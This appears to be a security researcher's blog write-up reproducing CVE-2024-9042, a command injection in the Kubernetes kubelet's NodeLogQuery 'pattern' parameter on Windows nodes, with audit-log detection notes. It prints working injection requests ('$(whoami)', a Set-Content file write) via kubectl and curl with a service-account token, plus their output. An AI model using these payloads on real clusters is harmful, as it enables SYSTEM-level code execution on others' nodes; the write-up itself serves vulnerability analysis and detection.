Originally posted by AmberWolf at https://blog.amberwolf.com/blog/2025/january/reproducing-cve-2024-9042—command-injection-in-windows-kubernetes-nodes/

Introduction

Yesterday (16th Jan, 2025) I woke up to an email on the Kubernetes announcements mailing list. The Kubernetes Security Response Committee published an advisory for CVE-2024-9042, a vulnerability which affected Windows worker nodes which had the ability to query the /logs endpoint. There didn’t appear to be a detailed writeup available, and it’s been a while since I looked into a vuln like this in detail, so I figured I’d spend a couple of hours diving into the details.

For the avoidance of doubt, this vulnerability was not identified by AmberWolf. As per the original disclosure attribution is as follows: This vulnerability was reported by Peled, Tomer and mitigated by Aravindh Puthiyaprambil.

Reproduction Steps

At first sight this vulnerability appears to affect functionality which is gated behind the NodeLogQuery feature gate, which has been in Beta since Kubernetes 1.30. As per the documentation, NodeLogQuery “Enables querying logs of node services using the /logs endpoint.”

On my test Windows node running Kubernetes 1.32, the NodeLogQuery behaviour was not enabled by default. Without it, I was able to see a directory listing on the kubelet’s /logs endpoint. This behaviour isn’t new, having existed in the Kubelet for some years now, and has had its own security issues in the past.

1
2
3
4
5
6
7
8
9
❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/"
<!doctype html>
<meta name="viewport" content="width=device-width">
<pre>
<a href="calico/">calico/</a>
<a href="containers/">containers/</a>
<a href="kubelet/">kubelet/</a>
<a href="pods/">pods/</a>
</pre>

However, while experimenting it didn’t seem to support the ?query parameter mentioned in the advisory. Note that the snippet below shows the same output with and without the query parameter.

1
2
3
4
5
6
7
8
9
❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=kubelet"
<!doctype html>
<meta name="viewport" content="width=device-width">
<pre>
<a href="calico/">calico/</a>
<a href="containers/">containers/</a>
<a href="kubelet/">kubelet/</a>
<a href="pods/">pods/</a>
</pre>

To try to get a better understanding of the vuln, I looked at the original issue https://github.com/kubernetes/kubernetes/issues/129654 which linked to https://github.com/kubernetes/kubernetes/pull/129595/, a PR which made changes to, you guessed it, the NodeLogQuery feature. At this point I was pretty sure I was on the right track, so I enabled the features on my test Windows node1 by making the following changes:

  1. Add --feature-gates='NodeLogQuery=true' to C:\var\lib\kubelet\kubeadm-flags.yaml
  2. Add enableSystemLogHandler: true and enableSystemLogQuery: true to C:\var\lib\kubelet\config
  3. Run restart-service kubelet

The test node was running kubelet v1.32.0, which until this vuln was announced, was the most recent version available.

The endpoints for this aren’t something I’ve played with before, but the functionality is relatively well detailed in this blog post. By querying /api/v1/nodes/{nodename}/proxy/logs/?query={service}, I can get back the logs for a Windows service.

1
2
3
❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=kubelet"

log not found for kubelet

Admittedly there’s no content in the logs for this service, but we’re getting closer. Trying again with docker as the service2, I got back some logs:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=docker"

   ProviderName: docker

TimeCreated          Id LevelDisplayName Message                                                                       
-----------          -- ---------------- -------                                                                       
1/14/2025 7:28:06 AM  1 Information      Starting up                                                                   
1/14/2025 7:28:06 AM  1 Information      OTEL tracing is not configured, using no-op tracer provider                   
1/14/2025 7:28:06 AM  1 Information      Windows default isolation mode: process                                       
[...]
1/14/2025 8:31:29 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.
                                         Windows driver requires VNIs to be prepopulated               
1/14/2025 8:31:29 AM  1 Information      Loading containers: done.                                     
1/14/2025 8:31:29 AM 11 Information      Docker daemon [storage-driver=windowsfilter containerd-snapshotter=false
                                         version=27.5.0 commit=38b84dc]                                
1/14/2025 8:31:29 AM  1 Information      Daemon has completed initialization                           
1/14/2025 8:31:29 AM  1 Information      API listen on //./pipe/docker_engine 

By adding &pattern={searchTerm}, I can filter the output to only something that matches the provided pattern. The example below shows only the Error lines.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=docker&pattern=Error"
   ProviderName: docker

TimeCreated          Id LevelDisplayName Message                                                                       
-----------          -- ---------------- -------                                                                       
1/14/2025 7:28:07 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.  
                                         Windows driver requires VNIs to be prepopulated                               
1/14/2025 7:28:07 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.  
                                         Windows driver requires VNIs to be prepopulated                               
1/14/2025 8:29:54 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.  
                                         Windows driver requires VNIs to be prepopulated                               
1/14/2025 8:29:54 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.  
                                         Windows driver requires VNIs to be prepopulated                               
1/14/2025 8:31:29 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.  
                                         Windows driver requires VNIs to be prepopulated                               
1/14/2025 8:31:29 AM  1 Error            Error occurred when creating network insufficient vnis(0) passed to overlay.  
                                         Windows driver requires VNIs to be prepopulated                               

Referencing the git commits which fix this vulnerability, it appears that these parameters are passed to Powershell.exe. Passing user input to an operating system function sounds ripe for command injection. As it looks like Powershell is involved, let’s enable script logging on the node and see exactly what’s being invoked:

1
2
3
4
5
6
7
8
9
[...]
Windows PowerShell transcript start
Start time: 20250116031322
Username: WORKGROUP\SYSTEM
RunAs User: WORKGROUP\SYSTEM
Configuration Name: 
Machine: WIN-QTKTC6OHC3R (Microsoft Windows NT 10.0.20348.0)
Host Application: PowerShell.exe -NonInteractive -ExecutionPolicy Bypass -Command Get-WinEvent -ListProvider kubelet | Format-Table -AutoSize
[...]

As expected, we have a PowerShell command invocation running as WORKGROUP\SYSTEM. Initial attempts to inject on the ListProvider arguement (via the query parameter) were rejected, as special characters aren’t permitted. Other parameters included sinceTime and untilTime, which allow filtering based on an RFC3339 timestamp, and the aforementioned pattern. It turns out there have to be logs for the command which actually uses this parameter to be called, so we’ll return to using docker for the next few examples.

1
2
## Request
❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=docker&pattern=\$(whoami)"
1
2
## Powershell Logs
Host Application: PowerShell.exe -NonInteractive -ExecutionPolicy Bypass -Command Get-WinEvent -FilterHashtable @{LogName='Application'; ProviderName='docker'} | Sort-Object TimeCreated | Where-Object -Property Message -Match '$(whoami)' | Format-Table -AutoSize -Wrap

Perfect, we have our $(whoami) showing in the logs. It’s in quotes, so not evaluated, but we should be able to get around that by adding our own quotes:

1
2
3
4
5
6
7
# kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=docker&pattern='\$(whoami)'"
Where-Object : A positional parameter cannot be found that accepts argument 'nt authority\system'.
At line:1 char:107
+ ... meCreated | Where-Object -Property Message -Match ''$(whoami)'' | For ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Where-Object], ParameterBindingException
    + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell.Commands.WhereObjectCommand

And there we have it. Command execution on the remote host, evidenced by the presence of ntauthority\system in the command error.

Just in case as one colleague put it, “seeing a username in an intimidating-sounding Powershell error message doesn’t do it for you”, we can adapt this attack to perform something more dangerous, like writing a file to the Administrator’s desktop:

1
2
3
4
# Request
❯ kubectl get --raw "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?query=docker&pattern='\$(Set-Content -Path C:\\\\Users\\Administrator\\Desktop\\test.txt \"pwnd\")'"
Where-Object : A positional parameter cannot be found that accepts argument '$null'.
At line:1 char:107
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# On server
PS C:\Users\Administrator> ls .\Desktop\

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/16/2025   9:52 AM              6 test.txt

PS C:\Users\Administrator> type .\Desktop\test.txt
pwnd

Testing Directly on the Kubelet

Up to now I’ve been testing using my cluster-admin credentials. To validate the minimum privileges necessary to perform the attack, I created a clusterrole and clusterrolebinding to grant only the get nodes/log permission to the default:default service account, then communicated directly with the Windows node kubelet from inside a pod, using the pod’s service account token:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
root@testpod:/# curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" "https://192.168.20.215:10250/logs/?pattern=%27%24%28whoami%29%27&query=docker"
Where-Object : A positional parameter cannot be found that accepts argument 'nt authority\system'.
At line:1 char:107
+ ... meCreated | Where-Object -Property Message -Match ''$(whoami)'' | For ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Where-Object], ParameterBindingException
    + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell.Commands.WhereObjectCommand

root@testpod:/# kubectl auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
globalnetworkpolicies.projectcalico.org         []                                     []               [*]
networkpolicies.projectcalico.org               []                                     []               [*]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
nodes/log                                       []                                     []               [get]

Unsurprisingly, the attack works just as effectively when performed directly against a Kubelet as when proxied through the API Server. This has the additional consideration of being excluded from any Kubernetes audit logs, as Kubelet API calls bypass the Kubernetes API Server audit logging almost entirely, with the exception of a SubjectAccessReview being performed to validate credentials.

Detections

Speaking of audit logs, I enabled audit logging set to RequestResponse on the cluster to see what these requests look like when proxying through the API Server. The relevant entry is below:

1
2
3
iain@kubemaster01:/etc/kubernetes/manifests$ sudo cat /var/log/kubernetes/audit/audit.log  | grep -i 'logs'
{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","auditID":"2806f063-0a07-4b4d-9146-48ddcf52966f","stage":"ResponseComplete","requestURI":"/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?pattern=%27%24%28iex+-command+whoami%29%27\u0026query=Power","verb":"get","user":{"username":"kubernetes-super-admin","groups":["system:masters","system:authenticated"],"extra":{"authentication.kubernetes.io/credential-id":["X509SHA256=37d5642940d5c44ef25fa0878103944e68f58e2c7a1b743386a5b574e4298c9d"]}},"sourceIPs":["192.168.3.119"],"userAgent":"kubectl/v1.30.5 (linux/amd64) kubernetes/74e84a9","objectRef":{"resource":"nodes","name":"win-qtktc6ohc3r","apiVersion":"v1","subresource":"proxy"},"responseStatus":{"metadata":{},"code":200},"requestReceivedTimestamp":"2025-01-16T18:38:28.879260Z","stageTimestamp":"2025-01-16T18:38:29.938042Z","annotations":{"apiserver.latency.k8s.io/etcd":"661.654µs","apiserver.latency.k8s.io/response-write":"1.16µs","apiserver.latency.k8s.io/total":"1.058782532s","authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""}}
[...]

Or, made a little more readable, the bit that should be concerning to cluster operators monitoring for this attack:

1
2
3
stage: "ResponseComplete",
requestURI: "/api/v1/nodes/win-qtktc6ohc3r/proxy/logs/?pattern=%27%24%28iex+-command+whoami%29%27&query=Power",
verb: "get",

Summary

To summarise, the pattern parameter used by the NodeLogQuery feature was being passed directly to Powershell without filtering. This leaves the endpoint open to command injection by any user or service account with permissions to with GET permissions on nodes/logs, allowing them to execute commands on each Windows node as NTAuthority\system. This attack does require authentication, specific RBAC permissions, and network access to the Kubelet on a Windows node which has a non-default feature explicitly enabled by administrators.


  1. Interestingly, the Kubernetes Docs on feature stages suggest that a Beta feature is enabled by default, but this feature is explicitly disabled by default. ↩︎

  2. Docker wouldn’t typically be available on a Windows Kubernetes node, but I had explicitly installed it alongside containerd to test some different workflows on the same machine. We could use any service which returns logs. ↩︎